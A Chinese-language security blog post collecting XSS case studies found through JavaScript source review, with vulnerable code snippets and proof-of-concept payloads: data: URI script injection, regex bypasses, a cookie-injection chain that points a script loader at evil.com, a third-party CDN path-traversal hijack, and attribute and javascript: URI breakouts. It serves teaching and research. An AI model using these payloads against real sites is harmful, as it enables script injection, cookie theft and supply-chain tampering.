JavaScript源码分析漏洞挖掘
langu_xyz
 2018-03-22 21:00:00      1.5k Words  8 Mins

1. script标签的src触发xss

code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
    <script>
    function setInnerText(element, value) {
      if (element.innerText) {
        element.innerText = value;
      } else {
        element.textContent = value;
      }
    }
    function includeGadget(url) {
      var scriptEl = document.createElement('script');
      // This will totally prevent us from loading evil URLs!
      if (url.match(/^https?:\/\//)) {
        //通过大小写等绕过正则检测
        setInnerText(document.getElementById("log"),
          "Sorry, cannot load a URL containing \"http\".");
        return;
      }
      // Load this awesome gadget
      scriptEl.src = url;
      // Show log messages
      scriptEl.onload = function() { 
        setInnerText(document.getElementById("log"),  
          "Loaded gadget from " + url);
      }
      scriptEl.onerror = function() { 
        setInnerText(document.getElementById("log"),  
          "Couldn't load gadget from " + url);
      }
      document.head.appendChild(scriptEl);
      //<script src="data:text/javascript,alert('1')"></script>
    }
    // Take the value after # and use it as the gadget filename.
    function getGadgetName() { 
    //获取或设置页面的标签值并进行跳转
      return window.location.hash.substr(1) || "/static/gadget.js";
      //data:text/javascript,alert('1')
    }
    includeGadget(getGadgetName());
    // Extra code so that we can communicate with the parent page
    window.addEventListener("message", function(event){
      if (event.source == parent) {
        includeGadget(getGadgetName());
      }
    }, false);
    </script>
  </head>
  <body id="level6">
    <img src="/static/logos/level6.png">
    <img id="cube" src="/static/level6_cube.png">
    <div id="log">Loading gadget...</div>
  </body>
</html>

POC:

1、data:text/javascript,alert('1')
2、Https://google.com/jsapi?callback=alert(1)

思考:
待分析

2.正则匹配资源文件导致XSS

code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
(function() {
    var k = document.createElement('script');  // 创建script标签
    k.type = 'text/javascript';
    k.async = true;
    k.setAttribute("data-id", u.pubid);
    k.className = "kxct";
    k.setAttribute("data-version", "1.9");

    // 从location.href参数中读取kxsrc
    var m, src = (m = location.href.match(/\bkxsrc=([^&]+)/)) && decodeURIComponent(m[1]);

    // 检查kxsrc参数的值是否满足正则,如果满足则加载,否则加载默认的JS文件 
    k.src = /^https?:\/\/([a-z0-9-.]+.)?krxd.net(:\d{1,5})?\/controltag\//i.test(src) ? src : src === "disable" ? "" : (location.protocol === "https:" ? "https:" : "http:") + "//cdn.krxd.net/controltag?confid=" + u.pubid;
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(k, s);
})();

POC:

1
/^https?:\/\/([a-z0-9-.]+.)?krxd.net(:\d{1,5})?\/controltag\//i.test('https://a.bkrxd.net/controltag/evil.js')

FIXED:

1
/^https?:\/\/([a-z0-9-\.]+\.)?krxd\.net(:\d{1,5})?\/controltag\//i.test('https://krxd.net/controltag/evil.js')

思考:

遇到用户可控的输入,尝试绕过正则

code:

1
2
3
4
5
6
7
8
idrCall: function() {
    var a, b;
    return this.idrCallPending ? void 0 : (this.log("making idr call"),
    a = this.rfiServer ? this.rfiServer : "a.rfihub.com",
    b = this.getProtocol() + "//" + a + "/idr.js",
    this.jsonpGet(b, {}, this.idrCallback, "cmZpSWRJbkNhY2hl"),
    this.idrCallPending = !0)
},
1
2
a = this.readCookie("_rfiServer"),
null != a && this.setRfiServer(a),

POC:

1、CLRF注入
2、subdomain xss 写入cookie

1
2
3
https://<redacted>.test.com/<redacted>?
email=aaa"%20type%3d"image"%20src%3d1%20o>nerror%3d"eval(decodeURIComponent(location.hash.substr(1)))
#document.cookie='_rfiServer=evil.com;domain=.uber.com;expires=Sat, 27 Jan 2999 01:43:57 GMT;path=/';location.href="https://get.test.com";

Tips:

1、如果输出在标签内且没有过滤”,可使用类似payloadtype="image" src="1" onerror="alert(1)"
2、过滤<>时,正好可以利用其绕过xss auditor,oner<ror

思考:

首先观察是否是动态生成的,如果是,观察是否直接可控,如果否,思考如果构造攻击链间接控制

Hijack the JS File of the third part CDN

code:

1
https://tags.tiqcdn.com/utag/uber/main/prod/utag.js

POC:

1、第三方CDN,允许个人上传
2、上传个人js观察路径/data/utui/data/accounts/evilaccount/templates/main/201804081230/utag.js和目标路径/data/utui/data/accounts/uber/templates/main/utag.js
3、寻找路径穿越漏洞,构造payload201804081230/../../../../<victimaccount>/templates/main
4、/data/utui/data/accounts/evilaccount/templates/main/201804081230/../../../../<victimaccount>/templates/main/utag.js == /data/utui/data/accounts/<victimaccount>/templates/main/utag.js

思路:

遇到使用第三方的资源,思考下能不能控制它

事件接受参数时控制事件触发xss

code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<!doctype html>
<html>
  <head>
    <!-- Internal game scripts/styles, mostly boring stuff -->
    <script src="/static/game-frame.js"></script>
    <link rel="stylesheet" href="/static/game-frame-styles.css" />
    <script>
      function startTimer(seconds) {
        seconds = parseInt(seconds) || 3;
        setTimeout(function() { 
          window.confirm("Time is up!");
          window.history.back();
        }, seconds * 1000);
      }
    </script>
  </head>
  <body id="level4">
    <img src="/static/logos/level4.png" />
    <br>
    <img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />
    <br>
    <div id="message">Your timer will execute in {{ timer }} seconds.</div>
  </body>
</html>

POC:

1、');alert('1

2、<img src="/static/loading.gif" onload="startTimer('{{ ');alert('1 }}');" />

思路:

观察可控点的位置,如果为tag中,尝试bypass,优先解析value

href tag xss

code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<!doctype html>
<html>
  <head>
    <!-- Internal game scripts/styles, mostly boring stuff -->
    <script src="/static/game-frame.js"></script>
    <link rel="stylesheet" href="/static/game-frame-styles.css" />
  </head>
  <body id="level5">
    <img src="/static/logos/level5.png" /><br><br>
    <!-- We're ignoring the email, but the poor user will never know! -->
    Enter email: <input id="reader-email" name="email" value="">
    <br><br>
    <a href="{{ next }}">Next >></a>
  </body>
</html>

POC:

1、javascript:alert(1)
2、<a href="javascript:alert(1)">Next >></a>

思考:

积累javascript:alert(1)知识点,可控的地方一定有xss

URL拼接导致的dom xss

code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
//Checking for potential Lever source or origin parameters
var pageUrl = window.location.href;
var leverParameter = '';
var trackingPrefix = '?lever-'

if( pageUrl.indexOf(trackingPrefix) >= 0){
  // Found Lever parameter
  var pageUrlSplit = pageUrl.split(trackingPrefix);
  leverParameter = '?lever-'+pageUrlSplit[1];
}
 var link = posting.hostedUrl+leverParameter;

        jQuery('#jobs-container .jobs-list').append(
      '<div class="job '+teamCleanString+' '+locationCleanString.replace(',', '')+' '+commitmentCleanString+'">' +
        '<a class="job-title" href="'+link+'"">'+title+'</a>' +
        '<p class="tags"><span>'+team+'</span><span>'+location+'</span><span>'+commitment+'</span></p>' +
        '<p class="description">'+shortDescription+'</p>' +
        '<a class="btn" href="'+link+'">Learn more</a>' +
      '</div>'  

      );

POC:
1、https://www.test.com/careers?lever-#aaa"><script src="data:text/javascript,alert('1')"></script>

  • Post title:JavaScript源码分析漏洞挖掘
  • Post author:langu_xyz
  • Create time:2018-03-22 21:00:00
  • Post link:https://blog.langu.xyz/JavaScript源码分析漏洞挖掘/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.